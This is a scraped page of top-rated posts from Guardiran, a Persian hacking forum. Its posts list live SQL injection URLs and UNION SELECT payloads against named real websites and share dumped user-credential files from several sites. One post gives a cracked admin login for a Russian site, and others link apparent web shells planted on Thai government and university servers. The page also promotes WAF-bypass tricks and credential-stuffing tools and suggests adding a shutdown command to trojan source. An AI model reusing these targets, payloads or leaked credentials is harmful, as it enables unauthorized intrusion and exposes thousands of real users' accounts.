ts icon
سرور تیم اسپیک گاردایران

پرچمداران

  1. mownten

    mownten

    کاربر انجمن


    • امتیاز

      59

    • تعداد ارسال ها

      313


  2. DeMoN

    DeMoN

    مدیر ارشد


    • امتیاز

      23

    • تعداد ارسال ها

      2,564


  3. R3dC0d3r

    R3dC0d3r

    مدیر تیم


    • امتیاز

      16

    • تعداد ارسال ها

      112


  4. MR.wIzArD

    MR.wIzArD

    کاربر انجمن


    • امتیاز

      13

    • تعداد ارسال ها

      148



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان یکشنبه, 11 اسفند 1398 در همه بخش ها

  1. 6 امتیاز
    سلام. داداش زیاد watch dogs بازی کردیا. مگه هر کی به هرکیه؟ این حرفا چیه میزنی؟ شما فقط دریافت کننده از هسته ی کدنویسی هستی نه تعیین کننده. اصلا چطور میخوای شکلک بذاری که برات دستور اجرا کنن؟ چرا همچین تصوری بالیوودی از علوم سایبری داری؟
  2. 5 امتیاز
    42 میلیون شناسه کاربری و شماره تلفن کاربران یک نسخه غیر رسمی از تلگرام، بدون هیچگونه احراز هویت مورد نیاز برای دسترسی به داده های آن در معرض دید آنلاین قرار گرفت. تمامی حساب های کاربری متعلق به کاربران ایرانی است، این در حالی است که نسخه رسمی Telegram در ایران مسدود شده است. بر اساس گزارش های ارائه شده توسط یک محقق امنیتی به نام Bob Diachenko، وی در آشکار سازی و گزارش این اطلاعات با شرکت تحقیقاتی Comparitech همکاری داشته است. این اطلاعات شامل نام کاربری و شماره تلفن کاربران به همراه داده های اساسی دیگر است. داده ها توسط گروهی به نام “سامانه شکار” در یک کلاستر Elasticsearch ارسال شده است که برای دسترسی به آن هیچ گونه رمز عبور و احراز هویتی لازم نبود. این داده ها در 25 مارس سال جاری، پس از آنکه Diachenko این واقعه را به سرویس دهنده گزارش داد، حذف شدند. توسعه دهندگان تلگرام رسمی در واکنش به این رویداد اظهار کرده اند داده ها از یک “انشعاب” غیر رسمی تلگرام گرفته شده است، نسخه ای از این برنامه که با شرکت اصلی تلگرام سازگار نیست. Telegram یک برنامه منبع باز است و به اشخاص ثالث این اجازه را می دهد تا نسخه های مربوط به خود را تهیه و شخصی سازی کنند. از آنجا که نسخه رسمی تلگرام غالباً در ایران مسدود شده است. با وجود هشدارهای توسعه دهندگان اصلی تلگرام، مردم ایران هنوز از نسخه های غیر رسمی استفاده می کنند. برنامه های تلگرام منبع باز هستند، بنابراین استفاده از برنامه های رسمی که از ساختار های قابل اطمینان پشتیبانی می کنند، مهم است. این حادثه بار دیگر نیز در سال 2016 اتفاق افتاد، زمانی که رویترز خبر افشای 15 میلیون شناسه کاربری تلگرام به همراه شماره تلفن و کدهای تأیید یک بار مصرف، توسط هکرهای ایرانی را شناسایی کرد که بیش از میلیون ها حساب کاربری به خطر افتاده بود. چه اطلاعاتی در معرض دید قرار گرفته است؟ این پایگاه داده حاوی بیش از 42 میلیون پرونده شامل داده های کاربران ایرانی است شامل: شناسه حساب کاربری نام کاربری شماره تلفن هش و کلیدهای مخفی خوشبختانه هش ها و کلیدهای مخفی از پایگاه داده را نمی توان برای دسترسی به حساب ها استفاده کرد. به گفته سخنگوی تلگرام، آنها فقط از داخل حسابی که متعلق به آنها هستند، کار می کنند. منبع: https://www.comparitech.com/
  3. 5 امتیاز
    با سلام خدمت اعضا و کاربران تیم امنیتی گارد ایران مفتخرم که فرا رسیدن نوروز باستانی ، یادآور شکوه ایران و یگانه یادگار جمشید جم رو بر خانواده بزرگ گاردایران تبریک عرض کنم با توجه به برنامه ها و زمان بندی های در نظر گرفته شده ، سال پیش رو سال مهمی در زمینه پیشرفت کاری گاردایران هست ؛ هدف گذاری هایی دقیقی از پیش انجام گرفته که زمان برداشت آنها در سال 99 هست . پیشاپیش از تمام عزیزانی که در این مسیر همراه ما هستند تشکر میکنم و آرزوی توفیق روز افزون برای همه شما عزیزان دارم . از طرف تیم مدیریت گارد ایران
  4. 4 امتیاز
    به نام خدا با سلام خدمت اعضای محترم گاردایران گاردایران طی سال های فعالیت خود همیشه سعی کرده بهترین بستر رو برای یادگیری و فعالیت کاربران فراهم کند. گاردایران هیچگاه از مسیر کیفیت خارج نشده، از جمله این اقدامات میتوان به نداشتن تبلیغات در سایت، طراحی قالب های متنوع و اختصاصی، ساخت و پشتیبانی ابزارهای اختصاصی و مهمتر از همه حضور مداوم و آنلاین و آپدیت بودن انجمن گاردایران اشاره کرد. به همین منظور سروری در TeamSpeak برای شما عزیزان تهیه کردیم و شما علاقه مندان به دنیای هک و امنیت (علوم کامپیوتری) میتوانید به راحتی با مدیران و دیگر اعضای گاردایران در ارتباط باشید. این بستر برای یادگیری و ارتباط شما عزیزان با یکدیگر فراهم شده، امیدوارم ساعات خوشی رو در کنار دیگر اعضای گاردایران سپری کنید. آدرس سرور(nickname): guardiran برای دانلود نرم افزار TeamSpeak اینجا کلیک کنید. در صورت عدم دسترسی به سرور فیلترشکن خود را روشن کنید.(ترجیحاً از VPN آلمان استفاده کنید.)
  5. 4 امتیاز
    echzed

    bypass NOT ACCEPTABLE

    سلامی دوباره DANTE هستم اینبار اومدم بایپس یک ارور در باگ sqli یا همون sql injection رو معرفی کنم ممکنه ما تا یک جایی پیش بریم ولی با ارور NOT ACCEPTABLE مواجه بشیم اصلا ماهیت این ارور چیه؟ : این ارور نشون میده که سرور اجرای بعضی کد ها رو قفل کرده که ما میتونیم به دو روش دورش بزنیم روش اول: با نوشتن کد زیر /*!50000your_code*/ و به جای your_code دستور که فکر میکنید بلاک شده است را مینویسین روش دوم: بعضی از حروف دستوری که فکر میکنید اشتباه است را بزرگ بنویسید امیدوارم لذت برده باشید
  6. 4 امتیاز
    با سلام به تمام دوستان DANTE هستم امروز میخواهیم با هم بایپس یوزر و پسورد ادمین رو پچ کنیم تا دوستان بتوانند سایت هایی با امنیت بیشتر داشته باشند. اول کمی درباره ی بایپس یوزر و پسورد کمی صحبت کنیم: ما با وارد کردن بعضی دستورات در جایگاه وارد کردن یوزر و پسورد دیتابیس رو گول میزنیم و به عنوان ادمین وارد میشویم مانند 'or''=' <?php $username = $_POST("username"); $password = $_POST("password"); ?> *من رو اگر در جایی اشتباه کردم ببخشید تسلط دقیق ندارم *شما جای password و username چیز هایی که خودتون تعریف کردید بزارید این در حالت عادی هست که برای ورود استفاده میشه حالا یا با کمی فرق یا کد های بیشتر ولی ما با این قسمت کار داریم ما در اینجا میبینیم که فقط یوزر و پسورد رو میگیریم و دیگه کار نداریم چیا توشه پس ما الان باید روی ورودی ها نظارت کنیم و اجازه ی وارد کردن هر کاراکتری رو به کاربر ندیم پس بیاین کد رو اصلاح کنیم <?php $username = $_POST["username1"]; $username1 = str_replace("="," ",$username); $password = $_POST["password"]; $password1 = str_replace("="," ",$password); ?> خب بیاین کد رو تحلیل کنیم داریم میگیم اگر کاربر = وارد کرد اونو با فاصله عوض کن و دوباره username(در خط چهارم) یا password(در خط ششم) رو اجرا کن و در خط های سوم و پنجم هم داریم میگیم که بیا password1 و username1 که ما در اونجا = رو اصطلاحا بلاک کردیم رو اجرا کن خب حالا یه مشکل ما فقط تونستیم = روبلاک کنبم الان یکی با بایپس 'or'1 میتونه مارو دور بزنه پس ما الان میایم ' رو بلاک میکنیم تا خیالمون راحت بشه <?php $username = $_POST["username1"]; $username1 = str_replace("="," ",$username); $username1 = str_replace("'"," ",$username); $password = $_POST["password"]; $password1 = str_replace("="," ",$password); $password1 = str_replace("'"," ",$password); ?> ما الان دقیقا همون کار قبلی رو انجام دادیم ولی اینبار به جای = اومدیم ' قرار دادیم و ' هم بلاک کردیم ممنون سوالی داشتید در خدمتم
  7. 4 امتیاز
  8. 4 امتیاز
    یک تارگت تمرینی: https://www.bible-history.com/subcat.php?id=2 حدود 20 تا دیتابیس داره. اکثرا وردپرس هستن. پسوردها رمزنگاری شده به جز یکی از دیتابیس ها که مشخصاتش اینه: user: jc pass: Mos3s اگر هم خواستید به صورت دستی پیش برید از این لینک استفاده کنید: https://www.bible-history.com/subcat.php?id=-2+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4--+- فایل دامپ یوزرهای کل دیتابیس ها هم پیوست میکنم. امیدوارم بدردتون بخوره. رمز: guardiran.org موفق باشید www.bible-history.com - 20 DBS.zip
  9. 4 امتیاز
    این یه وبسایت گیم هست که جدول هاش شامل ستون های مرتبط با جزئیات آی دی بازی ها هست. دیتابیسش هم MariaDB هست https://www.battleoflegends.com/game.php?id=7
  10. 4 امتیاز
    این تارگت هم فایروال داره. اسم فایروالش 360websec هست. خودمم دارم باهاش کشتی میگیرم. برای تمرین شماها هم خوبه: http://120.25.219.52/sell2/game.php?id=48 توی این لینک هم میتونید آموزش های مربوط به بایپس فایروال ها رو یاد بگیرید و تست کنید: https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
  11. 4 امتیاز
    این تارگت هم فایروال داره و برای تمرین بایپس ارور Not Acceptable عالیه. میتونید از کد زیر برای بایپس استفاده کنید: /*!50000*/ http://www.susandaulfolkart.com/item.php?ID=-13
  12. 3 امتیاز
    http://sunpointworld.com/sitefiles/a3b7a5ef.php
  13. 3 امتیاز
    https://www.mostori.com/product_picb/190610301016Goodzilam3.php
  14. 3 امتیاز
    An0nyM0us

    XXS

    آشنایی با حملات xss یا Corss Site Scripting نوعی آسیب پذیری رایانه است که که معمولا در برنامه های وب یافت می شود. حملات xss به مهاجمان امکان میدهد اسکریپت های سمت مشتری به صفهات وب که توسط سایر کاربران مشاهده میشود تزریق کنند. یک آسیپ پذیری در سطح سایت ممکن است توسط مهاجمین برای دور زدن کنترل های دسترسی مانند سیاست همان مبدا استفاده میشود ################## آموزش تزریق اسکریپت و نحوه حمله xss نحوه عمل حمله xss یه اسکریپت بنویسید و کد های فوقه را در اون قرار بدید در اینجا من تارگت رو سایت www.yasdl.com قرار دادم خوب بریم سراغ آموزش <html> <head> <script scr="http://www.yasdl.com/index.php" ></script> // در اینجا من اولین اسکرپت رو تزیق کردم <script>alert(123);</script> این کد یه alert نشان میده و شما از این راه میفهمین سایت فوقه باگ xss داره </head> </html> باگ xss.txt XSS.zip
  15. 3 امتیاز
    سلام دوستان. الان نسخه 10.2 نرم افزار Sqli Dumper رو دیدم که وبسایت psntools.ir معرفی کرده بود و توی کانال تلگرامیشون گذاشته بودن. من خودم از ورژن 9.7 استفاده میکنم و به نسبت 9.7، اجزایی به این نسخه اضافه شده اما حس میکنم کمی سرعتش پایین تر از 9.7 هست. در هر صورت میذارمش که بررسی کنید. ضمناً مسئولیت هرگونه سوء استفاده از این ابزار بر عهده کاربر هست. رمز : guardiran.org SQLiDumper 10.2.zip
  16. 3 امتیاز
    سلام به همه ی دوستان. از اونجا که ویروس کورونا همه چیز رو به تعطیلی کشونده و من هم نمیتونم بشینم در و دیوار رو نیگا کنم، تصمیم گرفتم دوره های آموزشی بیشتری ببینم. در همین حین تصمیم گرفتم کمبوهایی که از سایت های مختلف دامپ میکنم رو براتون بذارم. استفاده کنید. هر کسی هم که توی زمینه Sql Injection اقدام به دامپ کمبو میکنه، ازش دعوت میکنم بیاد بذاره تا بدرد بقیه هم بخوره. ضمنا دوستان سعی کنن اطلاعات رو طبق همین فرمت که گذاشتم بذارن. اولین کمبویی که میخوام بذارم مربوط به وبسایت edmazur.com هست. لینک: http://edmazur.com/game/item.php?id=15 تعداد: فقط یکی از فایلها که دیتای اعضا هست ، بالای 18000 ردیف شامل Username و Email و Password داره.(البته کمی خورده شیشه هم داره لکن پسورد ها رمزنگاری نشدن.) محتویات: 4 فایل csv و دو فایل xml - فایل csv تا حد ممکن که مربوط به ربات هاشون هست رمزگشایی شده و فایل xml بدون رمزنگاری هست رمز فایل فشرده: guardiran.org edmazur.com Combos (Guardiran.org).zip
  17. 3 امتیاز
    فدراسیون تکواندو اسراییل خودشم مشکل داره تارگت خوبیه. با ق.ن.دشکن برید: https://isr-tkd.com/index.php?cntr=e/news.php?id=1
  18. 3 امتیاز
    لینک: http://lejdesigns.com/tp/user.php?id=3 تعداد: حدود 5000 ردیف شامل یوزرنیم، پسورد، سالت و غیره محتویات: یک فایل xml رمز فایل فشرده: guardiran.org lejdesigns.com -4893 Rows.zip
  19. 3 امتیاز
    فقط محض تمرین http://animalbehaviorandcognition.org/article.php?id=1110 این یکی هم هست و میتونید برید سعی کنید بهش لوگین بشید لینک: http://www.geliomar.ru/index.php?id=747 Login Link: http://www.geliomar.ru/manager یوزر و پسورد: Roslov 3432585e6eba2323315400617ae59d96 = dfyz
  20. 3 امتیاز
    اینم یه تارگت با کلی یوزر و همچنین پسورد رمزنگاری شده. امیدوارم مفید باشه: https://www.rentquip.com/item.php?id=-46'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,(SELECT+GROUP_CONCAT(email," ",password," ",salt+SEPARATOR+0x3c62723e)+FROM+users),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+-
  21. 3 امتیاز
  22. 3 امتیاز
    نمیدونم اینو از کجا کپی کردی اما خب فکر کنم اولین بار که خودم این مطلبو تو انجمن جهانی خوندم برای دوستان تو همین تیم به اشتراک گذاشتم فقط میتونم برات آرزوی موفقیت کنم لینک پست اصلی : https://guardiran.org/topic/7635-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D9%87%DA%A9-%D8%AF%D9%88%D8%B1%D8%A8%DB%8C%D9%86-%D9%85%D8%AF%D8%A7%D8%B1%D8%A8%D8%B3%D8%AA%D9%87/?tab=comments#comment-29299
  23. 2 امتیاز
    موقه نصب میز کار انتخاب نکردی این بار انتخاب کن بزار دان بشه حدود دوگیگه نصب نکنی فقط ترمینال داری
  24. 2 امتیاز
    درود چه نوع باگی ؟ سطح دسترسی مشتق شده از این باگ چی هست ؟ اطلاعات مربوطه راجب این متد رو در پیام خصوصی بنده یا یکی از مدیران مطرح کنید در صورت کارامد بودن تصمیم به نحوه بهره برداری از این باگ گرفته خواهد شد (گزارش برای باگ بانتی / نفوذ) .
  25. 2 امتیاز
    خواهش می کنم دوست عزیز خیلی ممنونم که لطف کردید پاسخ دادید خدا خیرتون بده همیشه موفق باشید
  26. 2 امتیاز
    سلام دوست من وقتتون بخیر بابت لحن امروز معذرت میخوام ! کمی نامساعد هستم ! بگذریم لینک زیر برای آموزش کامل نرم افزار sentry mba هست : https://guardiran.org/topic/3225-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%DA%A9%D8%A7%D9%85%D9%84-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-sentry-mba/?tab=comments#comment-13789 لینک دانلود نرم افزار sentry mba : https://guardiran.org/topic/484-%D9%86%D8%B1%D9%85-%D8%A7%D9%81%D8%B2%D8%A7%D8%B1-%DA%A9%D8%B1%DA%A9-sentry-mba/?tab=comments#comment-1130 لینک دانلود کتاب آموزش نرم افزار sntry mba : https://guardiran.org/topic/5670-%D8%A7%D9%86%D9%88%D8%A7%D8%B9-%DA%A9%D8%AA%D8%A7%D8%A8-%D9%87%D8%A7%DB%8C-%D8%A2%D9%85%D9%88%D8%B2%D8%B4%DB%8C-%D9%86%D9%81%D9%88%D8%B0-%D8%A8%D9%87-%D8%B3%D8%A7%DB%8C%D8%AA-%D9%88-%D8%B3%D8%B1%D9%88%D8%B1/?tab=comments#comment-25002 لینک زیر برای کانفیگ اینستا و سایت های دیگه هست https://guardiran.org/topic/7162-%D9%81%D9%88%D9%84-%DA%A9%D8%A7%D9%86%D9%81%DB%8C%DA%AF-sentry-mba-%D8%A8%D8%B1%D8%A7%DB%8C-%D9%87%D9%85%D9%87-%D8%B3%D8%A7%DB%8C%D8%AA-%D9%87%D8%A7/?tab=comments#comment-28667 موفق باشید
  27. 2 امتیاز
    به نام خدا ی بزرگ با سلام یه تعدادی کتاب و کد داشتم براتون آپلود کردم. و اینکه دوست دارم اون هایی که این روزها چه تو خونه و چه تو بیمارستان در حال جنگ با این بیماری هستن زودتر خوب بشن و به زندگی عادی برگردن. این فقط آرزوی من نیست. آرزوی همه ی ما هست. همیشه موفق و سالم باشید. یا علی. Book.rar Code.rar
  28. 2 امتیاز
    اگر هم یک موقع دیدید که اینترنت ندارید و در هر کادر خاصی از پنجره ها بودید . حتی وقتی که یه جا پسوردتون ذخیره هست ولی یادتون رفته و میخواید ببینیدش که چی ذخیره شده میتونید با google chrome یا mozilla firefix روی کادر پسورد کلیک راست کنید و و Inespect رو بزنید. توی کدهای اون کادر میبینید که این عبارت نوشته شده: type=password این یعنی اینکه اون کادر موظف هست هر ورودی که داره رو به شکل پسورد با علامت ستاره نشون بده. شما هم عبارت password رو به text تغییر بدید و اینتر بزنید. میبینید که متن رو واضح نشون میده. این هم مال مواقعی که بخواید بصورت دستی، یه پسورد رو بخونید. موفق باشید
  29. 2 امتیاز
    [سطح: متوسط] با عرض سلام و تبریک سال نو به کاربران عزیز من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas. امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست: $ git clone https://github.com/m4ll0k/Atlas.git atlas $ cd atlas $ python atlas.py فرض کنیم لینک اسیب پذیر ما این هست: http://site.com/index.php?id=Price_ASC و پیلود ما هم اینه: -1234 AND 4321=4321-- AAAA برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید: $ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v حالا این ابزار کجا و چه زمانی استفاده میشه؟ فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 تصویر رو ببینید: در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده. پیلود : Price_ASC') AND 8716=4837 AND ('yajr'='yajr کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل: $ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v حالا نتیجه : میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه. پس از این تمپر بدین شکل استفاده می کنیم: $ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords لینک دریافت Atlas از Github: https://github.com/m4ll0k/Atlas موفق باشید. سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید. Atlas-sqlmap-tamper-suggesy-master.zip
  30. 2 امتیاز
    سلام دوستان ؛ توی این بخشی که اضافه کردم میخوام سطح بالاتری از آموزش زبان پایتون ارائه بدم که مخصوص هکر ها و متخصصان تست نفوذ و امنیت شبکه هست. پس اگه با زبان پایتون بصورت ویژه آشنایی دارید و همچنین با مباحث شبکه و تست نفوذ میتونید با من همراه باشید. فقط یک نکته قبلش بگم که تمامی آموزش ها در همین تاپیک ایجاد شده ویژه ارائه میشه. در ضمن برای برقراری ارتباط با من میتونید از طریق ارسال پیام در سایت یا در تلگرام با ای دی @samm3ry ارتباط برقرار کنید. بدون معطلی میرم سراغ اولین آموزش. توی بخش اول میخوایم دو برنامه مرتبط به هم بنویسیم شامل برنامه سمت سرور و برنامه سمت کلاینت برنامه سمت سرور :‌ import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((socket.gethostname(), 1234)) s.listen(5) while True: clientsocket, address = s.accept() print(f"Connection from {address} has been established!") clientsocket.send(bytes("Welcome to the server!", "utf-8")) clientsocket.close() خب من توضیحاتی در مورد این کد براتون مینویسم : پارامتر AF_INET برای استفاده از IPv4 یا hostname است. پارامتر SOCK_STREAM مربوط به TCP Client است. برنامه سمت کلاینت : import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((socket.gethostname(), 1234)) full_msg = '' while True: msg = s.recv(8) if len(msg) <= 0: break full_msg += msg.decode("utf-8") print(full_msg) client.py server.py
  31. 2 امتیاز
    سلام این دیپ فریز رو زیادی بزرگش کردن یه ویندوز لایو بزن بیا بالا شیفت دلیتش کن
  32. 2 امتیاز
    سوال رو بصورت شخصی پرسیدید و جوابتون رو دادم. چرا پست میکنید دیگه؟
  33. 2 امتیاز
    لینک: https://www.linleygroup.com/mpr/login.php?session_id=km8g8u96v5cre2h2709taknp81&return_url=/mpr/article.php?id=12264&num=1671 تعداد: حدود 27000 ردیف اطلاعات کاربری شامل ایمیل، پسورد هش شده، آدرس کامل، تلفن و غیره محتویات : یک فایل xml رمز فایل فشرده: guardiran.org linleygroup.com -27000 Rows.zip
  34. 2 امتیاز
    میشه سورس بلاسترو با سورس تروجان تلفیق کرد؟ مثلا زیر سورس تروجان، سورس بلاسترو بزاریم. فکر نکنم مشکلی باشه اگه درست به یاد داشته باشم سورس بلاستر اینه shutdown -s -t 30
  35. 2 امتیاز
    نه تاپیک خواب نیست. https://www.amtechnologies.in/blog-item.php?id=-1
  36. 2 امتیاز
    درود دقیقا راجب کدوم سوال و مشکل دارید حرف میزنید ؟ کالی رو نصب کردید ، متن لایسانسش نمایش داده شد ؛ روت شده و در نهایت به شل لینوکس دسترسی گرفتید ! اگر منظورتون نبود محیط گرافیکیه ، سری به این تاپیک بزنید ! یا حق
  37. 2 امتیاز
    http://www.agri.rmutsb.ac.th/website/uploads/edge.php
  38. 2 امتیاز
    http://koonnapab.chiangmaihealth.go.th/gallery/edge.php
  39. 2 امتیاز
    http://mim.tbs.tu.ac.th/cms/upload_images/71edge.php با Open BaseDir 11 تا ساب دامین قابل نفوذ هست
  40. 2 امتیاز
    DeMoN

    Today Is A Good Day

    Today Is A Good Day
  41. 2 امتیاز
    اینم از ادامه پارت ها آموزش بعدی فردا یا پس فردا انشالله یا حق guardiran.part05.rar guardiran.part06.rar guardiran.part07.rar guardiran.part08.rar
  42. 1 امتیاز
    برای مشاهده فیلم آموزشی روی لینک زیر کلیک کنید. https://www.aparat.com/v/aCgUf
  43. 1 امتیاز
    با پایتون نوشته شده! باید با پایتون 3 اجراش کنی!! python app.py همین MIni-Cracker.zip
  44. 1 امتیاز
    R3dC0d3r

    مشکل در WPscan

    سلام کاملا مشخصه ، API Key که دسترسی شما را به پایگاه داده آسیب پذیری این ابزار فراهم میکنه تعریف نشده ؛ همونطور که گفته شده میتونید یک کلید موقتی رایگان از آدرس داده شده دریافت کنید در بسیاری از مواقع خروجی یک ابزار در برخورد با مدیریت خطا ، یک خروجی صریح و واضح هست ؛ کافیه اون رو مطالعه کنید .
  45. 1 امتیاز
    با سلام و درود خدمت تمامی اعضای محترم گارد ایران رد فریم ورک درواقع فریمورکی مدرن ، وابسته به الگوی مدل - ویو - کنترلر با بسیاری ابزار و اجزای ساختار یافته نوشته شده به زبان پی اچ پی و تلفیق شده با فریمورک سمت فرانت (رد جی اس) توسط اینجانب م.عزیزخانی به جهت رشد و پیشرفت جامع برنامه نویسی و استفاده هموطنان عزیز کشورمان توسعه داده شده . بعد از گذشت یک سال ، رد فریم ورک به ورژن 1.0.0 خودش رسیده و در 2 کیت عرضه شده : کیت جامع کیت جامع یک فریم ورک مدل - ویو - کنترلر و چند منظوره به جهت سازماندهی و سرعت بخشی روند توسعه است از برخی اجزای با کیفیت آن می توان به کامپونت های زیر اشاره کرد : موتور پایگاه داده قدرتمند قادر به پشتیبانی سه پایگاه داده معروف (MySQL, SQLServer, SQLite) ، سه جایگاه دیتابیس ، ORM با عملکرد بالا قادر به پیشتیبانی تمامی عملکرد های دیتابیس سیستم کد امنیتی آسان سرویس صندوق پست (SMTP Mail Server) سرویس آپلود امن سرویس ارزیابی ، فیلتر و زدودن رشته سیستم چند زبانه ساختار یافته سیستم مسیر یابی حرفه ای ، مجهز به Middleware ورودی های مدیریت شده (پارامتر های URL ، متد GET ، متد POST و ...) نشست های ساختار یافته و رمز گزاری شده ابزار عیب یابی قدرتمند و ... کیت کنسول اپلیکیشن کیت کنسول اپلیکیشن شامل تمامی اجزای ضروری و سیستم فرمان به جهت توسعه هرچه سریع تر کنسول اپلیکیشن در پی اچ پی آماده سازی شده است . به کمک این کیت قادرید کنسول اپلیکیشن پیشرفته خود را در بستر پی اچ پی توسعه دهید . رد آنالیتیکس رد فریم ورک همراه با یک ابزار قدرتمند به نام رد آنالیتیکس ارائه شده ؛ رد آنالیتیکس یک ابزار چند منظوره هست که به جهت سرعت بخشی روند توسعه مثل اجرای برنامه بر روی سرور توسعه ، تولید کردن کنترلر - مدل - ویو - میدل ور ، آنالیز روت ها یا فرمان های اپلیکیشن در دسترس توسعه دهنده قرار داده شده . رد آنالیتیکس به زبان شیرین جاوا به جهت یک برنامه Cross Platform برنامه نویسی شده ؛ با این حساب توسعه دهنده قابلیت اینو داره که در هر جایی پروژه رد فریم ورکش رو با رد آنالیتیکس توسعه بده ! این ابزار سازگاری لازم با هر دو کیت رو داره رد جی اس رد فریم ورک تعامل جالبی رو با جاوا اسکریپت برای توسع دهندگان فراهم کرده است بنده به جهت نزدیک تر کردن رابطه Back End و Front End دست به توسعه یک فریم ورک جوا اسکریپتی بردم و در حال حاضر این فریم ورک به نسخه 1.0 خودش رسیده . از قابلیت های رد جی اس میتوان به موارد زیر اشاره کرد : پیروی از الگوی طراحی MVC کد نویسی درون تگ های HTML دسترسی آسان به المان و تغییر ویژگی آن ارسال درخواست AJAX مدیریت کوکی ها افکت گرافیکی سرویس ارزیابی ، فیلتر و زدودن رشته نصب و ساخت پروژه ساخت پروژه با کیت جامع از طریق کامپوزر : composer create-project redframework/enterprise ساخت پروژه با کیت کنسول اپلیکیشن از طریق کامپوزر : composer create-project redframework/console-kit ساخت پروژه از طریق ابزار رد آنالیتیکس : * ابزار رد آنالیتیکس در انتهای این پست ضمیمه شده است - مخزن گیت هاب برای توسعه دهندگان کیت جامع کیت کنسول رد جی اس هسته کیت جامع هسته کیت کنسول - لینک های مهم وبسایت رسمی (در دست طراحی) مستندات سوال و جواب های عمومی * هرگونه به روز رسانی و Patch Note در همین تاپیک پست خواهد شد . Red Analytics.jar Offline Docs (1.0).zip
  46. 1 امتیاز
    1TED

    Dmitry Footprinting Tool

    درود ../ با آموزش جمع آوری اطلاعات در مورد تارگت مورد نظر با ابزار Dmitry در کالی لینوکس در خدمت شما هستیم پوزش اگه کیفیت صدا مطلوب نیست امید وارم به دردتون بخوره یا حق ../ Screencast_12-04-2019_10:23:31 PM.mp4 Download
  47. 1 امتیاز
    dawsh ye pishnahad kari daram tell pm bede @spacea 09387700913 az dastesh nade
  48. 1 امتیاز
  49. 1 امتیاز
    با عرض سلام و شب بخیر به اینکه داره سربازیم تموم میشه و اگه خدا بخواد پیش ب سوی فعالیت دوباره.
  50. 1 امتیاز
    http://zone-h.com/mirror/id/30229869 http://zone-h.com/mirror/id/30228907